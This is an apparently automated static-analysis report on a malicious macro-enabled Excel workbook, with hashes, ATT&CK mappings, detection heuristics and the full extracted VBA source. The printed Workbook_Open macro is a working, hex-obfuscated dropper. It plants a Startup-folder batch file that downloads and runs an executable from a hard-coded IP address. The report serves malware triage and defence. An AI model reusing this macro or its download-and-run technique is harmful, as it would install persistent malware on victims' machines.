Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 136b7155ecedf085…

MALICIOUS

Office (OOXML) / .XLSX

Size: 70.1 KB
Created: 2015-06-05 18:17:20 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2022-08-06
MD5: 43e366bf2aaca9da55de7c14353be322
SHA-1: 4dbd84437d41b133e9443ce1d1f8717843c12b13
SHA-256: 136b7155ecedf0855ceea32694b39ac6e0ea15d7c3ab8eabc7104472e47f74da
Risk Score: 170

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder
  • T1059.003 Windows Command Shell
  • T1105 Ingress Tool Transfer

The Workbook_Open macro uses CreateObject("WScript.Shell") to write a batch file named 'e038ff73.bat' to the user's Startup folder. This batch file, constructed from concatenated hex values, appears to download and execute a VBScript payload ('e038ff73.vbs'). The script's intent is to establish persistence and likely download a second-stage payload.

Heuristics (6)

  • VBA project inside OOXML (severity: medium; 4 related findings; rule OOXML_VBA)
    Document contains a VBA project (VBA macros present).
  • WScript.Shell usage (severity: critical; rule OLE_VBA_WSCRIPT)
    WScript.Shell usage.
    Matched line in script:
    sf = CreateObject("WScript.Shell").SpecialFolders("Startup")
  • CreateObject call (severity: high; rule OLE_VBA_CREATEOBJ)
    CreateObject call.
    Matched line in script:
    sf = CreateObject("WScript.Shell").SpecialFolders("Startup")
  • VBA p-code auto-exec with execution tokens (severity: high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro (severity: low; rule OLE_VBA_WBOPEN)
    Workbook_Open macro.
    Matched line in script:
    Private Sub Workbook_Open()
  • Suspicious extracted artifact (severity: info; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 6471 bytes
SHA-256: 6f97d20c2559d33157c935c306e48519b9048378bdc569a05b911669ef2ac468
Detection:
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 21 long base64-like blob(s).

Script preview (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim sf
sf = CreateObject("WScript.Shell").SpecialFolders("Startup")
Set File = CreateObject("Scripting.FileSystemObject").CreateTextFile(sf & "\e038ff73.bat", True)
Dim hex1
hex1 = "6563686F206F66660A64656C202F712F662F73202574656D70255C65303338666637332E7662730A64656C202F712F662F73202574656D70255C653033386666"
Dim count1
count1 = Len(hex1)
For i = 1 To count1 Step 2
    File.Write Chr(CInt("&h" & Mid(hex1, i, 2)))
Next
Dim hex2
hex2 = "37332E6578650A5345542066663D2574656D70255C65303338666637332E7662730A5345542070313D44696D20683A0A5345542070323D2053657420680A5345"
Dim count2
count2 = Len(hex2)
For i = 1 To count2 Step 2
    File.Write Chr(CInt("&h" & Mid(hex2, i, 2)))
Next
Dim hex3
hex3 = "542070333D203D204372650A5345542070343D6174654F626A0A5345542070353D65637428224D0A5345542070363D6963726F736F0A5345542070373D66742E"
Dim count3
count3 = Len(hex3)
For i = 1 To count3 Step 2
    File.Write Chr(CInt("&h" & Mid(hex3, i, 2)))
Next
Dim hex4
hex4 = "584D4C0A5345542070383D4854545022290A6563686F202570312525703225257033252570342525703525257036252570372525703825203E3E20256666250A"
Dim count4
count4 = Len(hex4)
For i = 1 To count4 Step 2
    File.Write Chr(CInt("&h" & Mid(hex4, i, 2)))
Next
Dim hex5
hex5 = "5345542070313D44696D20733A0A5345542070323D2053657420730A5345542070333D203D204372650A5345542070343D6174654F626A0A5345542070353D65"
Dim count5
count5 = Len(hex5)
For i = 1 To count5 Step 2
    File.Write Chr(CInt("&h" & Mid(hex5, i, 2)))
Next
Dim hex6
hex6 = "63742822410A5345542070363D646F64622E530A5345542070373D747265616D220A5345542070383D29200A6563686F20257031252570322525703325257034"
Dim count6
count6 = Len(hex6)
For i = 1 To count6 Step 2
    File.Write Chr(CInt("&h" & Mid(hex6, i, 2)))
Next
Dim hex7
hex7 = "2525703525257036252570372525703825203E3E20256666250A5345542070313D682E4F70656E0A5345542070323D2022474554220A5345542070333D2C2022"
Dim count7
count7 = Len(hex7)
For i = 1 To count7 Step 2
    File.Write Chr(CInt("&h" & Mid(hex7, i, 2)))
Next
Dim hex8
hex8 = "6874740A5345542070343D703A2F2F31370A5345542070353D382E31382E320A5345542070363D34302E3230370A5345542070373D2F70726976610A53455420"
Dim count8
count8 = Len(hex8)
For i = 1 To count8 Step 2
    File.Write Chr(CInt("&h" & Mid(hex8, i, 2)))
Next
Dim hex9
hex9 = "70383D74652F636F6D0A5345542070393D70616E795F640A534554207031303D657461696C730A534554207031313D2F6162632E650A534554207031323D7865"
Dim count9
count9 = Len(hex9)
For i = 1 To count9 Step 2
    File.Write Chr(CInt("&h" & Mid(hex9, i, 2)))
Next
Dim hex10
hex10 = "222C20460A534554207031333D616C7365200A6563686F2025703125257032252570332525703425257035252570362525703725257038252570392525703130"
Dim count10
count10 = Len(hex10)
For i = 1 To count10 Step 2
    File.Write Chr(CInt("&h" & Mid(hex10, i, 2)))
Next
Dim hex11
hex11 = "25257031312525703132252570313325203E3E20256666250A5345542070313D682E53656E640A6563686F2025703125203E3E20256666250A5345542070313D"
Dim count11
count11 = Len(hex11)
For i = 1 To count11 Step 2
    File.Write Chr(CInt("&h" & Mid(hex11, i, 2)))
Next
Dim hex12
hex12 = "663D204372650A5345542070323D6174654F626A0A5345542070333D6563742822530A5345542070343D6372697074690A5345542070353D6E672E46696C0A53"
Dim count12
count12 = Len(hex12)
For i = 1 To count12 Step 2
    File.Write Chr(CInt("&h" & Mid(hex12, i, 2)))
Next
Dim hex13
hex13 = "45542070363D6553797374650A5345542070373D6D4F626A65630A5345542070383D7422292E47650A5345542070393D7453706563690A534554207031303D61"
Dim count13
count13 = Len(hex13)
For i = 1 To count13 Step 2
    File.Write Chr(CInt("&h" & Mid(hex13, i, 2)))
Next
Dim hex14
hex14 = "6C466F6C640A534554207031313D6572283229200A534554207031323D2B20222F65300A534554207031333D3338666637330A534554207031343D2E65786522"
Dim count14
count14 = Len(hex14)
For i = 1 To count14 Step 2
    File.Write Chr(CInt("&h" & Mid(hex14, i, 2)))
Next
Dim hex15
hex15 = "200A6563686F20257031252570322525703325257034252570352525703625257037252570382525703925257031302525703131252570313225257031332525"
Dim count15
count15 = Len(hex15)
For i = 1 To count15 Step 2
    File.Write Chr(CInt("&h" & Mid(hex15, i, 2)))
Next
Dim hex16
hex16 = "70313425203E3E20256666250A5345542070313D5769746820730A6563686F2025703125203E3E20256666250A5345542070313D2E54797065200A5345542070"
Dim count16
count16 = Len(hex16)
For i = 1 To count16 Step 2
    File.Write Chr(CInt("&h" & Mid(hex16, i, 2)))
Next
Dim hex17
hex17 = "323D3D2031200A6563686F202570312525703225203E3E20256666250A5345542070313D2E4F70656E200A6563686F2025703125203E3E20256666250A534554"
Dim count17
count17 = Len(hex17)
For i = 1 To count17 Step 2
    File.Write Chr(CInt("&h" & Mid(hex17, i, 2)))
Next
Dim hex18
hex18 = "2070313D2E77726974650A5345542070323D20682E7265730A5345542070333D706F6E7365420A5345542070343D6F6479200A6563686F202570312525703225"
Dim count18
count18 = Len(hex18)
For i = 1 To count18 Step 2
    File.Write Chr(CInt("&h" & Mid(hex18, i, 2)))
Next
Dim hex19
hex19 = "2570332525703425203E3E20256666250A5345542070313D2E73617665740A5345542070323D6F66696C65200A5345542070333D662C2032200A6563686F2025"
Dim count19
count19 = Len(hex19)
For i = 1 To count19 Step 2
    File.Write Chr(CInt("&h" & Mid(hex19, i, 2)))
Next
Dim hex20
hex20 = "7031252570322525703325203E3E20256666250A5345542070313D456E642057690A5345542070323D74680A6563686F202570312525703225203E3E20256666"
Dim count20
count20 = Len(hex20)
For i = 1 To count20 Step 2
    File.Write Chr(CInt("&h" & Mid(hex20, i, 2)))
Next
Dim hex21
hex21 = "250A7374617274202F57202574656D70255C65303338666637332E7662730A7374617274202574656D70255C65303338666637332E6578650A64656C202530"
Dim count21
count21 = Len(hex21)
For i = 1 To count21 Step 2
    File.Write Chr(CInt("&h" & Mid(hex21, i, 2)))
Next
File.Close
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Artifact 2
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 19456 bytes
SHA-256: ebc2eebe2ca8ee39a2f8c7e7c7a334cd7b4c585ce83cf6e097d45628269c94d9
Detection:
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 21 long base64-like blob(s).